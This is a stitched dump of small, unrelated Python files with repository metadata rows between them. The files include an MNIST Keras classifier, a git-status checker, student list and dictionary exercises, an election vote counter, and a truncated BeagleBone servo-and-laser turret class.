np.random.seed(seed)
# just for the spyder console window to display all tuples and cols
pd.options.display.max_columns = 100
pd.options.display.max_rows = 100
(X_train,Y_train),(X_test,Y_test) = mnist.load_data()
print('Dataset has been loaded')
print('Shapes of training dataset are: X=',X_train.shape,'|| Y=',Y_train.shape)
# two samples from the training dataset plotted as images
plt.imshow(X_train[0])
plt.show()
plt.imshow(X_train[1])
plt.show()
# making the dataset fron 3D to 2D
num_pixels = X_train.shape[1]*X_train.shape[2]
X_train = X_train.reshape(X_train.shape[0],num_pixels).astype('float32')
X_test = X_test.reshape(X_test.shape[0],num_pixels).astype('float32')
# we'll now scale the inputs from 0-1 since here it's easy and a good idea.
# colors always range from 0-255 so we'll divide the inputs by 255
X_train = X_train/255
X_test = X_test/255
print('Y_train: ',Y_train)
# this is the one-hot encoding of categories( digits 0-9, here ). If you want to know more you can google it
# for now just remember that most of the ML algorithms don't work without one-hot encoding of categories.
Y_train = np_utils.to_categorical(Y_train)
Y_test = np_utils.to_categorical(Y_test)
print('Number of categories: ',Y_test.shape[1])
num_categories = Y_test.shape[1]
# now we'll define a function where we create a Sequential model
# we'll be building a fairly simple model for this problem
def baseline_model():
model = Sequential()
model.add(Dense(num_pixels , input_dim = num_pixels , kernel_initializer = 'normal' , activation = 'relu'))
model.add(Dense(num_categories , kernel_initializer = 'normal' , activation = 'softmax'))
# compiling the model
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
model = baseline_model()
# fitting the simple neural network model
model.fit(X_train, Y_train, validation_data = (X_test,Y_test),epochs = 10, batch_size = 200, verbose = 1)
scores = model.evaluate(X_test, Y_test, verbose = 1)
print("Baseline Error: %.2f" % (100-scores[1]*100))
# now we'll save the keras model just so that we can use it
# whenever we want without the need to retrain it.
model_json = model.to_json()
with open('model.json','w') as json_file:
json_file.write(model_json)
model.save_weights('model.h5')
print('Model has been saved successfully') | true |
b4633de1f6bcb8028f38202141d1937782ca588f | Python | feihong/feihong-setup | /bin/check-work-dirs.py | UTF-8 | 598 | 2.765625 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python3
"""
List directories in ~/work that have uncommitted changes.
"""
import os
import subprocess
from pathlib import Path
work_dir = Path.home() / 'work'
for dir_ in work_dir.iterdir():
if dir_.is_dir():
os.chdir(dir_)
if (dir_ / '.git').exists():
result = subprocess.check_output('git status', shell=True).decode('utf-8')
if 'nothing to commit, working directory clean' not in result:
print('{} contains uncommitted changes'.format(dir_))
else:
print('{} is not a git repository'.format(dir_))
| true |
4a3a992ed654ef3451204092a79cc59643271a44 | Python | DiasDogalakov/PP2_summer2020 | /5.py | UTF-8 | 85 | 2.765625 | 3 | [] | no_license | a = 1
b = "Hello world!!!"
c = 1j
print(type(a))
print(type(b))
print(type(c))
| true |
86384f85086b9ad3e831772210b98acf3b857c5d | Python | AndrewGiermak/python-challenge | /PyPoll/.main.py | UTF-8 | 1,860 | 3.3125 | 3 | [] | no_license | # import csv file
import os
import csv
import collections
from collections import Counter
filepath = os.path.join("learnpython","election_data1.csv")
# read file, header
with open("election_data1.csv", "r") as csvfile:
csvreader = csv.reader(csvfile, delimiter=',')
csvheader = next(csvreader)
# set variables
Vote_Count = Counter()
Candidates = []
County = []
Percent = []
Answer = []
# append Candidates
for row in csvreader:
Candidates.append(row[2])
# get total votes
Total_Votes = len(Candidates)
# count votes for each candidate
for Name in Candidates:
Vote_Count[Name] += 1
Names = tuple(Vote_Count.keys())
Votes = tuple(Vote_Count.values())
# get the percentages
for Value in Votes:
Percent.append((int(Value)/Total_Votes)*100)
# print everything
Answer.append("Election Results")
Answer.append("______")
Answer.append("Total Votes: " + str(Total_Votes))
Answer.append("______")
for x in range(len(Names)):
Answer.append(Names[x] + ": " + str(round(Percent[x], 3)) + "% " + "(" + str(Votes[x]) + ")")
Answer.append("______")
Answer.append("Winner: " + str(Names[0]))
print("\n".join((Answer)))
# create the txt file for the output
text_path = "pypoll_results.txt"
with open(text_path, "w") as txt_file:
txt_file.write("Election Results" + "\r\n"
"Total Votes: " + str(Total_Votes) + "\r\n"
"Khan: " + str(round(Percent[0], 3)) + "% " + "(" + str(Votes[0]) + ")" + "\r\n"
"Correy: " + str(round(Percent[1], 3)) + "% " + "(" + str(Votes[1]) + ")" + "\r\n"
"Li: " + str(round(Percent[2], 3)) + "% " + "(" + str(Votes[2]) + ")" + "\r\n"
"O'Tooley: " + str(round(Percent[3], 3)) + "% " + "(" + str(Votes[3]) + ")" + "\r\n"
"Winner: " + str(Names[0]))
| true |
7467cfdbaa03714f91eb76f8b750850470091e79 | Python | KevinEca/AnalyseDunesFluviales | /Main.pyw | UTF-8 | 317 | 2.796875 | 3 | [] | no_license | from tkinter import Tk
from Interfaces import MenuPrincipal
fenetre = Tk()
fenetre.title("Menu principal - Analyse dunes 2018")
# On empèche l'utilisateur de redimensionner la taille de la fenêtre
fenetre.resizable(width=False, height=False)
interface = MenuPrincipal.MenuPrincipal(fenetre)
interface.mainloop() | true |
43edfbb5c366add021616a74b75aea4cf0d1c2ef | Python | PanZeYong/Python | /Python 编程从入门到实践/第 3 章 列表简介/motorcycles.py | UTF-8 | 1,388 | 3.4375 | 3 | [
"Apache-2.0"
] | permissive | motorcycles = ['honda', 'yamaha', 'suzuki']
# print(motorcycles)
# motorcycles[0] = 'ducati'
# print(motorcycles)
# # motorcycles.append('ducati')
# motorcycles.insert(0, 'ducati')
# print(motorcycles)
# del motorcycles[0]
# print(motorcycles)
# popped_motorcycle = motorcycles.pop()
# print(motorcycles)
# print(popped_motorcycle)
# last_owned = motorcycles.pop()
# print("The last motorcycle I owned was a " + last_owned.title() + ".")
# print(motorcycles.remove('honda'))
# persons = ['John', 'Marry', 'Jane', 'Jim']
# for i in range(len(persons)):
# print("Hello " + persons[i] + ", I want to invite you to eat dinner !");
# print(persons[1] + "无法赴约。")
# persons[1] = "Perry"
# for i in range(len(persons)):
# print("Hello " + persons[i] + ", I want to invite you to eat dinner !");
# print('---------------')
# persons.insert(0, 'Jack')
# persons.insert(2, 'Michael')
# persons.append('Parker')
# for i in range(len(persons)):
# print("Hello " + persons[i] + ", I want to invite you to eat dinner !");
addresses = ['New York', 'Japan', 'England', 'Fance', 'America']
print(addresses)
print(sorted(addresses))
print(addresses)
print(sorted(addresses, reverse=True))
print(addresses)
addresses.reverse()
print(addresses)
print(addresses)
addresses.reverse()
print(addresses)
addresses.sort()
print(addresses)
addresses.sort(reverse= True)
print(addresses) | true |
43270821add16af7e018f5deef11f86f373a0572 | Python | Oleksii1985/home_work_7 | /hw_7.py | UTF-8 | 2,331 | 3.421875 | 3 | [] | no_license | from collections import Counter
# Task 1
dict_ = {"name": "Oleksii", "surname": "Voitiuk", "age": 36, "gender": "male", "phone": "0967618604"}
print("dict_:", dict_)
print("id dict_:", id(dict_))
first = list(dict_.items())[0]
second = list(dict_.items())[1]
last = list(dict_.items())[-1]
dict_[first[0]], dict_[last[0]] = last[1], first[1]
print("dict_:", dict_)
print("id dict_:", id(dict_))
dict_.pop(second[0])
print(dict_)
print(id(dict_))
dict_["new_key"] = "new_value"
print(dict_)
print(id(dict_))
# Task 2
student = {"name": "Emma", "class": 9, "marks": 75}
print(student.get("marks"))
# Task 3,4
p = {"name": "Mike", "salary": 8000}
print(p.get("age"))
# Answer: None
# Task 5
sample = {"1": ["a", "b"], "2": ["c", "d"]}
print(sample["2"][1])
# Task 6
list_1 = ["Украина-Киев", "Россия-Сочи", "Беларусь-Минск", "Япония-Токио", "Германия-Мюнхен"]
list_2 = ["Киев", "Токио", "Минск"]
dict_ = {i.split('-')[0]: i.split('-')[1] for i in list_1 if i.split('-')[1] in list_2}
print(dict_)
# Task 7
choice_method = input("Please enter your choice encrypt or decrypt ('e'/'d'): ")
keys = {
'a': "!", 'b': "z", 'c': "y", 'd': "x", 'e': "w", 'f': "v",
'g': "u", 'h': "t", 'i': "s", 'j': "r", 'k': "q", 'l': "p",
'm': "o", 'n': "-", 'o': "n", 'p': "m", 'q': "l", 'r': "k",
's': "j", 't': "i", 'u': "1", 'v': "2", 'w': "3", 'x': "4",
'y': "5", 'z': "6", ' ': "7"
}
if choice_method == "e":
message = input("Please enter a message for encrypt: ")
cipher_text = []
message = list(message)
for symbol in message:
for key in keys:
if key == symbol:
cipher_text.append(keys[key])
print(cipher_text)
elif choice_method == "d":
message = input("Please enter code for decrypt: ")
normal_text = []
reverse_keys = {value: key for key, value in keys.items()}
message = list(message)
for symbol in message:
for key in reverse_keys:
if key == symbol:
normal_text.append(reverse_keys[key])
print(normal_text)
else:
print("You put incorrect value!")
# Task 8
dict_ = {key: key ** 3 for key in range(1, 11)}
print(dict_)
# Task 9
check_string = "gfalkglakgjklgkahjk"
result = Counter(check_string)
print("result is: ", result)
| true |
bc68bf01e96578c7c760d871e0b570c53801a1c8 | Python | AndyLee0310/108-1_Programming | /HW032.py | UTF-8 | 1,086 | 4.375 | 4 | [] | no_license | """
032. 數字穿插
給定一串數字,必須將該數字重新排序,
重新編排後,數字的左右兩側不能是自己,
且必須由小到大排序,
輸出的結果必須為最小的數字,
且符合左右兩側不能是自己的條件。
詳細說明:
假設給你一個1 2 2 3的數字,
左右不能是自己的條件狀況有,
1232 2132 2123 3212,
而輸出必須為其中最小數字,
所以答案是1232。
PS:題目不會有排不出來與Output超過int上限的情況
還有不會有兩位數以上的狀況如: 10 11 21(不過想挑戰的人可以試試看)
Input:
1 1 1 1 2 2 3 3
Output:
12121313
Input:
1 1 1 2 3 2 2 2 2
Output:
212121232
"""
import itertools
def test(b):
w = True
a = len(b)
for i in range(1,a-1):
if b[i] == b[i+1] or b[i] == b[i-1]:
w = False
break
return w
nums = input().split()
x = list(set(itertools.permutations(nums)))
y = []
for i in range(len(x)):
if test(x[i]):
y.append(int(''.join(x[i])))
print(min(y)) | true |
ddcde7aecc5d5be7ebc6a4e4d92b3618da963d5e | Python | JosephLevinthal/Research-projects | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4083/codes/1601_1805.py | UTF-8 | 263 | 3.546875 | 4 | [] | no_license | xa = float(input("Digite a coordenada de xa"))
ya = float(input("Digite a coordenada de ya"))
xb = float(input("Digite a coordenada de xb"))
yb = float(input("Digite a coordenada de yb"))
xm = (xb + xa)/2
ym = (yb + ya)/2
print(round(xm, 1))
print(round(ym, 1)) | true |
0bfecf9b7951484f6ab3c60d4be84d2bcb2a0aba | Python | amirhaziemdev/ant-dev | /ant-master/Panda/ant-control.py | UTF-8 | 529 | 2.859375 | 3 | [] | no_license | #!/usr/bin/python
#Ant keyboard control, has user keyboard input etc.
import serial
import time
import keyboard
baud = 115200
text = ' '
ino_stop = bytes('e')
port = '/dev/ttyACM0' #COM* for Windows, /dev/ttyACM* for Ubuntu
arduino = serial.Serial(port, baud, timeout=.1)
time.sleep(1)
print "Press 'Q' to quit"
while True:
print "in the loop"
text = keyboard.read_key()
if(text=='q'):
break
text = bytes(text)
arduino.write(text)
time.sleep(2)
arduino.write(ino_stop)
print text
| true |
0d846ade03e6f00f9730654fea4b707253379787 | Python | sebastianBIanalytics/data_algebra | /data_algebra/eval_model.py | UTF-8 | 1,273 | 2.9375 | 3 | [] | no_license | from abc import ABC
class EvalModel(ABC):
def __init__(self):
pass
def eval(self, ops, data_map, *, eval_env=None, narrow=True):
"""
apply ops to data frames in data_map
:param ops OperatorPlatform, operation to apply OperatorPlatform
:param data_map map from data frame names to data frames
:param eval_env environment to look for symbols in
:param narrow logical, if True don't copy unexpected columns
:return: result DataFrame
"""
raise NotImplementedError("base class called")
# noinspection PyPep8Naming
def transform(self, ops, X, *, eval_env=None, narrow=True):
"""
apply ops to data frame X, may or may not commute with composition
:param ops OperatorPlatform, operation to apply
:param X input data frame
:param eval_env environment to look for symbols in
:param narrow logical, if True don't copy unexpected columns
:return: transformed DataFrame
"""
tabs = ops.get_tables()
if len(tabs) is not 1:
raise ValueError("ops must use exaclty one table")
tname = [k for k in tabs.keys()][0]
return self.eval(ops, {tname: X}, eval_env=eval_env, narrow=narrow)
| true |
4b0b12440dc1ae1014dbac7a7d1f6fa16f0e08fc | Python | dufaultt/URI-Python-Solutions | /URI1235(Strings).py | UTF-8 | 607 | 3.078125 | 3 | [] | no_license | ##Tristan Dufault 2019-08-01
##https://www.urionlinejudge.com.br/judge/en/problems/view/1235
iter = int(input())
while(iter>0):
s = input()
sl = list(s)
hsl = sl.copy()
half = (int(len(sl)/2))-1
if((len(sl)%2) >0):
for i in range(half+1):
sl[i] = hsl[half-i]
for i in range(int(len(sl)/2)+1,len(sl)):
sl[i] = hsl[len(sl)+(int(len(sl)/2))-i]
else:
for i in range(half+1):
sl[i] = hsl[half-i]
for i in range(half+1,len(sl)):
sl[i] = hsl[len(sl)+half-i]
ans = ''.join(sl)
print(ans)
iter-=1
| true |
0e11cdf72caf7574138ef80eefd70b0a06022abb | Python | takecian/ProgrammingStudyLog | /LeetCode/top-interview-questions/36.py | UTF-8 | 2,070 | 3.46875 | 3 | [] | no_license | # https://leetcode.com/problems/valid-sudoku/
import itertools
from collections import Counter
import bisect
class Solution:
def isValidSudoku(self, board):
print(board)
# check rows
for i in range(9):
digits = set()
dot_count = 0
for j in range(9):
if board[i][j] != '.':
digits.add(board[i][j])
else:
dot_count += 1
if len(digits) != 9 - dot_count:
return False
# check colums
for i in range(9):
digits = set()
dot_count = 0
for j in range(9):
if board[j][i] != '.':
digits.add(board[j][i])
else:
dot_count += 1
if len(digits) != 9 - dot_count:
return False
# check sub boxes
for i in range(3):
for j in range(3):
digits = set()
dot_count = 0
for k in range(3):
for l in range(3):
if board[i * 3 + k][j * 3 + l] != '.':
digits.add(board[i * 3 + k][j * 3 + l])
else:
dot_count += 1
if len(digits) != 9 - dot_count:
return False
return True
def main():
s = Solution()
print(s.isValidSudoku([
["8","3",".",".","7",".",".",".","."],
["6",".",".","1","9","5",".",".","."],
[".","9","8",".",".",".",".","6","."],
["8",".",".",".","6",".",".",".","3"],
["4",".",".","8",".","3",".",".","1"],
["7",".",".",".","2",".",".",".","6"],
[".","6",".",".",".",".","2","8","."],
[".",".",".","4","1","9",".",".","5"],
[".",".",".",".","8",".",".","7","9"]
]))
if __name__ == '__main__':
main()
| true |
c9c1f8ffa17094040193f7d738012c2954854123 | Python | Mark-Orban/BTTest | /BTTest.py | UTF-8 | 827 | 3.09375 | 3 | [] | no_license | import bluetooth
print("Searching for nearby devices...\n")
try:
devices = bluetooth.discover_devices(lookup_names=True)
except:
print("Error")
print(devices)
while devices == []:
print("No bluetooth devices found")
retry = input("Try again? Y/N: ")
if retry.lower() == "n":
exit()
print("Searching for nearby devices...\n")
devices = bluetooth.discover_devices(lookup_names=True)
num = 0
for addr, name in devices:
num+=1
print(num, ".", name, "-", addr)
device_selected = int(input("Select your device: "))-1
print("You have selected:", devices[device_selected][1])
addr = str(devices[device_selected][0])
port = 1
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((addr[2:19], port))
def test():
sock.send(str.encode("Hello"))
test()
| true |
1e3ace6133b9fef48189dda47c73d3b2db8d0628 | Python | ministat/spark-metrics | /monitor-by-metrics/spark/param.py | UTF-8 | 325 | 2.609375 | 3 | [] | no_license | class Param(object):
def __init__(self, args=None):
if args != None:
for k, v in args.__dict__.items():
self.__dict__[k] = v
def __getattr__(self, name):
return self.__dict__[name]
def __setattr__(self, name, value):
self.__dict__[name] = value
| true |
a1a90a6702eee2c3a63e4cf17d996c512e4e6360 | Python | Yessinia-199/Tarea-Python-1 | /Módulo 2/src/primos.py | UTF-8 | 546 | 3.859375 | 4 | [] | no_license | #importacion de librerias
#constantes
#funciones y metodos
def es_primo(numero):
for n in range (2,numero,1):
if numero % n == 0:
return False
return True
#mi programa principal
if __name__ == "__main__":
#ingreso de numero por teclado
numero= int(input("ingrese un numero"))
#imprimo segun validacion
if es_primo(numero):
print(f"el numero: {numero} es primo")
else:
print(f"el numero: {numero} NO es primo") | true |
5c769381ef92a18e0c862b52071c9c3c20af0cbb | Python | KleinTong/Daily-Coding-Problem-Solution | /cousins_of_node/main.py | UTF-8 | 1,213 | 3.5 | 4 | [] | no_license | from binary_tree import BTree
from node import Node
def find_cousins(root, node):
def get_level(root, node):
def worker(item, level_cnt):
if item == node:
return level_cnt
if not item:
return -1
return max(worker(item.left, level_cnt + 1), worker(item.right, level_cnt + 1))
return worker(root, 1)
def helper(item, current_level, target_level):
if not item:
return []
if current_level == target_level:
return [item]
elif current_level > target_level:
return []
return helper(item.left, current_level + 1, target_level) + \
helper(item.right, current_level + 1, target_level)
node_level = get_level(root, node)
return helper(root, 1, node_level)
if __name__ == '__main__':
tree = BTree()
node_1 = Node(50)
node_2 = Node(130)
node_3 = Node(40)
node_4 = Node(152)
node_5 = Node(102)
tree.insert(node_1)
tree.insert(node_2)
tree.insert(node_3)
tree.insert(node_4)
tree.insert(node_5)
cousins = find_cousins(tree.root, node_5)
for cousin in cousins:
print(cousin)
| true |
512c38a5db0a920d88149bf8b7cdc317023e1444 | Python | hparekh62/pythonCourses | /INF308test1question1_new.py | UTF-8 | 459 | 3.96875 | 4 | [] | no_license | # Question 1
import random
randNum = 0
count = 0
numList = []
while randNum != 44:
randNum = random.randint(11, 444)
numList.append(randNum)
count = count + 1
numList.sort()
print("Largest number generated:", numList[-1]) # The largest number is at
print("Number of iterations:", count) # the end of the list
# When ran three times, the largest numbers were: 444, 443, 441
# When ran three times, the number of iterations were: 287, 397, 356
| true |
0e8b2b62f4e8efcc1376c18960e00435c2834ff2 | Python | alexander-mcdowell/Algorithms | /python/DecisionTree.py | UTF-8 | 7,612 | 3.8125 | 4 | [] | no_license | import math
import random
from scipy.stats import chi2
# Decision Tree: A simple yet effective method of machine learning that is easy for humans to interpret and is accurate for simple tasks.
# This specific decion tree implements multivalued attributes and classes, k-fold cross-validation, and chi-square pruning.
# k-fold cross-validation is a good way of getting an accurate model that should not overfit as easily, however, larger k values mean longer training.
# k-fold cross-validation:
# 1. Shuffle and divide the data (training and testing) into k equal partitions.
# For example, if the data was [1, 2, 3, 4, 5, 6] and k = 3, the partitions could be [1, 3], [2, 6], [4, 5]
# 2. For each model tested, set aside (k - 1) of the partitions for training and 1 of the paritions for testing.
# In the example above, Model #n might receive [1, 3] and [2, 6] as training and be tested on [4, 5].
# 3. Choose the model that minimizes loss/cost values.
# Chi-square pruning:
# 1. As with all chi-square tests, a null hypothesis (assumption that there is no correlation) is required.
# 2. Assume the null hypothesis has a probability of occuring of p. This is also known as the confidence interval.
# 3. Calculate the total deviation from expectation created by adopting a target attribute.
# 4. If total deviation > chi square statistic: do not choose this attribute.
# Method:
# 1. Initialize an empty decision tree.
# 2. Choose the attribute that has the greatest information gain.
# 3. Split the examples based on that attribute. Add the attribute to the tree.
# 4. Repeat 2-3 recursively for each set of split examples.
# The entropy (uncertainty) of a random variable that can fall into one of many attributes according to probs.
def entropy(probs):
x = 0
for p in probs:
if p != 0 and p != 1:
x -= p * math.log(p) / math.log(2)
return x
# The information gain of a target attribute is the change in entropy from adding a target attribute to the decision tree.
def information_gain(target_attribute, examples, attributes, classes, confidence = 0.05):
# Find the entropy of the parent set by noting the frequency of each classification and then dividing by the size of the parent set
class_counts = {c: 0 for c in classes}
for example in examples: class_counts[example[-1]] += 1
information_gain = entropy([class_counts[x]/len(examples) for x in class_counts])
# Find the entropy of splitting the parent set by a certain attribute.
# Entropy is calculated by summing over the entropies for each possible value of the attribute times the probability that it occurs in the parent set.
attribute_entropy = 0
total_deviation = 0
# There are len(examples) - 1 degrees of freedom.
chisquare_statistic = chi2.isf(confidence, len(examples) - 1)
for a in attributes[target_attribute]:
examples_subset = [e for e in examples if e[target_attribute] == a]
if len(examples_subset) != 0:
attribute_class_counts = {c: 0 for c in classes}
for example in examples_subset: attribute_class_counts[example[-1]] += 1
# Determine the deviation from expectation.
observed = [attribute_class_counts[x] for x in attribute_class_counts]
expected = [class_counts[x] * len(examples_subset) / len(examples) for x in attribute_class_counts]
deviations = [(observed[i] - expected[i]) ** 2 / expected[i] for i in range(len(observed))]
total_deviation += sum(deviations)
attribute_entropy += entropy([attribute_class_counts[x]/len(examples_subset) for x in attribute_class_counts]) * len(examples_subset)/len(examples)
if total_deviation > chisquare_statistic: return 0
information_gain -= attribute_entropy
return information_gain
def DecisionTree(examples, attributes, classes, attribute_names, tree = None, path = []):
if tree == None: tree = []
class_counts = {c: 0 for c in classes}
for example in examples: class_counts[example[-1]] += 1
if sorted(set([class_counts[k] for k in class_counts])) == [0, len(examples)]:
tree.append(path + [examples[0][-1],])
return None
if len(examples) == 1: return None
information_gains = [information_gain(a, examples, attributes, classes) for a in attributes]
best_attribute = list(attributes)[information_gains.index(max(information_gains))]
new_attributes = attributes.copy()
del new_attributes[best_attribute]
for k in attributes[best_attribute]:
examples_subset = [e for e in examples if e[best_attribute] == k]
DecisionTree(examples_subset, new_attributes, classes, attribute_names, tree, path + [[best_attribute, k]])
return tree
def predict(tree, unclassified_data):
if tree == None: return None
for possibility in tree:
decision = possibility[-1]
criteria = possibility[:-1]
criteria_met = 0
for property in criteria:
if unclassified_data[property[0]] == property[1]: criteria_met += 1
if criteria_met == len(criteria): return decision
return None
def accuracy(tree, target_data):
corrects = 0
for target in target_data:
if predict(tree, target) == target[-1]: corrects += 1
return corrects / len(target_data)
def kfold_partition(data, k):
if k == 1: return data, []
shuffled_data = data[::]
random.shuffle(shuffled_data)
i = (k - 1) * (len(data) // k)
training_data, validation_data = shuffled_data[:i], shuffled_data[i:]
return training_data, validation_data
# All values except the last are attributes, the last is the class value
data = [[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[1, 0, 1, 0, 1],
[1, 1, 0, 0, 1],
[1, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[1, 0, 0, 1, 0],
[1, 0, 1, 1, 0],
[0, 0, 1, 1, 0],
[1, 1, 0, 1, 0],
[1, 1, 1, 0, 1],
[0, 1, 0, 1, 0],
[0, 1, 1, 0, 0],
[1, 1, 1, 1, 0]]
attributes = {0: [0, 1],
1: [0, 1],
2: [0, 1],
3: [0, 1]}
attribute_names = ["a", "b", "c", "d"]
classes = [0, 1]
# Training: k-fold cross-validation with k = 5
best_accuracy = 0
k_max = 5
iterations = 2
best_trees = {}
for iteration in range(iterations):
for k in range(2, k_max + 1):
train_data, valid_data = kfold_partition(data, k)
tree = DecisionTree(train_data, attributes, classes, attribute_names)
acc = accuracy(tree, valid_data)
if acc >= best_accuracy:
best_accuracy = acc
if acc not in best_trees: best_trees[acc] = []
best_trees[acc].append(tree)
# Occam's Razor: The hypothesis (in our case model) which makes the least assumptions (in our case, requires the least criteria) is likely the best hypothesis.
best_tree = None
min_tree_length = 1e6
for tree in best_trees[max(best_trees)]:
if len(tree) < min_tree_length:
best_tree = tree
min_tree_length = len(tree)
# Print results:
print("Decision tree that fits the training data: ")
print("-" * 25)
for possibility in best_tree:
decision = possibility[-1]
criteria = possibility[:-1]
criteria_met = 0
s = "If "
for property in criteria: s += attribute_names[property[0]] + " = " + str(property[1]) + ", "
print(s + "then the data belongs to class " + str(classes[decision]))
print("-" * 25)
print("The accuracy of the decision tree is %.2f%% during validation." % (100 * best_accuracy))
| true |
7d34888c568246ed2fadd98a2a42deb33071ec39 | Python | XiplusChenyu/AI-Customer-Service | /DATA_DEALER/mark_recommendation.py | UTF-8 | 1,246 | 3.265625 | 3 | [] | no_license | import csv
from scraper import CSV_PATH
"""
Guide:
I choose the top 100 restaurant with:
lowest reviews counts and rate < 4.0 as not recommended
I choose the top 100 restaurant with:
highest reviews counts and rate > 4.0 as recommended
"""
with open(CSV_PATH, 'r') as csv_file:
reader = csv.reader(csv_file)
fieldnames = next(reader) # move the cursor
reader = csv.DictReader(csv_file, fieldnames=fieldnames)
rows = [row for row in reader]
rows.sort(key=lambda row: int(row['review_count']))
count_good = 0
count_bad = 0
for row in rows:
if 4 > float(row['rate']):
row['recommended'] = 0
count_bad += 1
if count_bad == 100:
break
else:
print('NOT THAT MANY BAD CANDIDATES')
rows.reverse()
for row in rows:
if 4 < float(row['rate']):
row['recommended'] = 1
count_good += 1
if count_good == 100:
break
else:
print('NOT THAT MANY GOOD CANDIDATES')
R_CSV_PATH = './data/data_marked.csv'
with open(R_CSV_PATH, 'w+') as out_file:
writer = csv.DictWriter(fieldnames=fieldnames, f=out_file)
writer.writeheader()
for row in rows:
writer.writerow(row)
| true |
25b4078f4dbdc8c07ce1fcc5fe9c21f1223ed6b4 | Python | dansjack/HackerEarth | /hackerEarth-py/basic_programming/complexity_analysis.py | UTF-8 | 845 | 4.1875 | 4 | [] | no_license | def sum_ab(a, b):
return int(a) + int(b)
def sum_ab_loop():
while True:
try:
a, b = input().split()
sum_ab(int(a), int(b))
except EOFError:
break
def vowel_recognition(s):
"""
Returns the number of vowels from every
possible substring in string s
:param s: string to analyze
"""
s = s.lower()
vowels = 0
size = len(s)
for i in range(size):
if s[i] in 'aeiou':
# if el is a vowel, count all the sub strings including el
# to the left (i + 1) and right (size - 1) and multiply
vowels += ((i + 1) * (size - i))
print(vowels)
return vowels
def vowel_rec_loop():
loops = int(input())
while loops > 0:
vowel_recognition(input())
loops -= 1
vowel_recognition('baceb') | true |
ba7b151e4544a7710b06dde331e929a26c40212b | Python | BerZerKku/PYTHON_PDF | /src/PDFmerge.py | UTF-8 | 5,204 | 2.71875 | 3 | [] | no_license | # -*- coding: utf-8 -*-
from argparse import ArgumentParser
from glob import glob
from pyPdf import PdfFileReader, PdfFileWriter
import sys, os, locale
FIND = [u"(СБ)", u"(СП)", u"(Э3)"] # признак поиска
MANUFACTURE = [u"(СБ)", u"(СП)"] # для Боковой не надо Э3
DEFAULT_NAME = "merged" # название файла по умолчанию
##
def crtOutputName(name, find):
''' (unicode, list of unicode) -> (unicode)
Возвращает имя файла.
Если в \a name передается название по умолчанию, в текущем каталоге
будет осуществлен поиск по признаку \a find. Имя будет сформированно
из первого найденного файла, удовлетворяющего строке поиска. Иначе
будет возвращено имя указанное в \a name.
'''
if name == DEFAULT_NAME:
for pdffile in glob(u'*.pdf'):
for f in find:
# поиск среди pdf, файлов с именем содержащим хотя бы одну
# строку из find
pos = pdffile.find(f)
if pos >= 0:
# если файл был найден, оставим в нем только то
# что находится до содержимого поиска
# так же убираются лишние пробелы в конце
name = pdffile[:pos]
else:
pos = name.find(".pdf")
if pos >= 0:
name = name[:pos]
return name.rstrip()
##
def crtFullDocument(path, output_filename, find):
''' (unicode, unicode, list of unicode) -> None
Сборка всех файлов документации в один файл.
'''
output_filename = unicode(output_filename)
input_files = []
files = glob(u'*.pdf')
# создается список возможных файлов и они затем ищутся в текущем каталоге
for f in [u"%s %s.pdf" % (output_filename, x) for x in find]:
if f in files:
input_files.append(f)
merge(path, u"%s.pdf" % (output_filename), input_files)
##
def crtSeparateDocuments(path, output_filename, find):
''' (unicode, unicode, list of unicode) -> None
Сборка раздельных файлов документации.
'''
output_filename = unicode(output_filename)
files = glob(u'*.pdf')
# создается маска для поиска файлов одинаковой документации и затем
# по этой маске выбираются файлы из текущего каталога
for doc in find:
input_files = []
input_mask = u"%s %s " % (output_filename, doc)
print(input_mask)
output_file = u"%s %s.pdf" % (output_filename, doc)
for f in files:
if input_mask in f:
input_files.append(f)
merge(path, output_file, input_files)
# pass
##
def merge(path, output_filename, input_files):
''' (unicode, unicode, list of unicode) -> None
Слияние файлов *.pdf.
Копирование всех страниц из файлов списка \a input_files (c учетом
расширения) в один выходной файл с именем \a output_filename.
'''
output = PdfFileWriter()
output_filename = unicode(output_filename)
cnt_pdf_file = 0 # счетчик найденных файлов
for f in input_files:
cnt_pdf_file += 1
document = PdfFileReader(open(f, 'rb'))
for i in range(document.getNumPages()):
output.addPage(document.getPage(i))
print(u"Обработан файл '%s'." % f)
if cnt_pdf_file == 0:
print(u"В текущем каталоге небыло найдено подходящих pdf файлов.")
else:
output_stream = None
try:
print(u"Сохранение в '%s'." % output_filename)
output_stream = file(output_filename, "wb")
except IOError:
print(u"Ошибка записи!")
print(u"Попытка сохранения в %s.pdf" % DEFAULT_NAME)
try:
output_stream = file(DEFAULT_NAME + '.pdf', "wb")
except:
print(u"Ошибка записи!")
if output_stream is not None:
output.write(output_stream)
output_stream.close()
##
if __name__ == "__main__":
parser = ArgumentParser()
# Add more options if you like
parser.add_argument("-o", "--output", dest="output_filename",
default=DEFAULT_NAME,
help=u"write merged PDF to FILE", metavar="FILE")
parser.add_argument("-p", "--path", dest="path", default=".",
help=u"path of source PDF files")
parser.add_argument("-s", "--separate", help=u"create separate documents",
action="store_true")
parser.add_argument("-f", "--full", help=u"create full document",
action="store_true")
args = parser.parse_args()
separate = args.separate
tmp = unicode(args.output_filename, locale.getpreferredencoding())
outputname = crtOutputName(tmp, FIND)
crtSeparateDocuments(args.path, outputname, FIND)
# if args.full:
crtFullDocument(args.path, outputname, MANUFACTURE)
k = raw_input() # ожидание ввода, чтобы консоль не закрывалась сама
| true |
83458cca82f945ccdbb39fe9ad23ca72153f5f44 | Python | Ereaey/Linux_Projet | /beaglebone/logiciel_beaglebone/servo_dbus/turret.py | UTF-8 | 1,592 | 2.78125 | 3 | [] | no_license | from servo import *
from shape import *
from led import *
import pwm
import json
class Turret:
def __init__(self):
pwm.enablePWM()
json_data=open('/home/debian/logiciel_beaglebone/servo_dbus/configuration.json')
data = json.load(json_data)
json_data.close()
self.servoHorizontal = Servo(data["configuration"]["servoHorizontal"])
self.servoVertical = Servo(data["configuration"]["servoVertical"])
self.laser = Led(int(data["configuration"]["laser"]))#P8_14
self.modeShape = Led(int(data["configuration"]["ledmode"]))
self.shape = Shape(self)
def setAngle(self, angleVertical, angleHorizontal):
